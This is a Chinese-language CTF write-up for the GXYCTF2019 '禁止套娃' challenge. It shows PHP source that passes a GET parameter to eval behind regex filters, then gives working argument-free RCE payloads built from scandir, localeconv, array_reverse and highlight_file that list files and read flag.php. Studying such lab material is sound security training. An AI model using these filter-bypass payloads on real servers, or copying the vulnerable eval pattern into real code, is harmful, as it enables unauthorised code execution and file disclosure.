[GXYCTF2019]禁止套娃

这个题目主要是无参数RCE，看到题目人都傻了，看了一下大佬的博客差不多懂了。

大佬博客

首先用御剑扫一下，得到了Git泄露的线索。git一下得到源码：

<?php
include "flag.php";
echo "flag在哪里呢？<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦！");
            }
        }
        else{
            die("再好好想想！");
        }
    }
    else{
        die("还想读flag，臭弟弟！");
    }
}
// highlight_file(__FILE__);
?>

首先是 isset($_GET['exp'])判空，所不为空则执行下面的语句。

然后是if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
这里过滤了几个伪协议，防止用伪协议读取文件。

接着是if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
(?R)引用当前表达式，后面加了?递归调用。只能匹配通过无参数的函数。

最后是if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
正则匹配掉了et/na/info等关键字，很多函数都用不了。

然后执行一下eval得到flag。

首先利用scandir(.)函数得到当前目录下的文件并用print_r()函数输出。localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是.

?exp=print_r(scandir(pos(localeconv())));

然后利用array_reverse()函数将数组逆序，并利用highlight_file()函数进行高亮。

?exp=print_r(next(array_reverse(scandir(pos(localeconv())))));    #得到flag.php
?exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));    #得到flag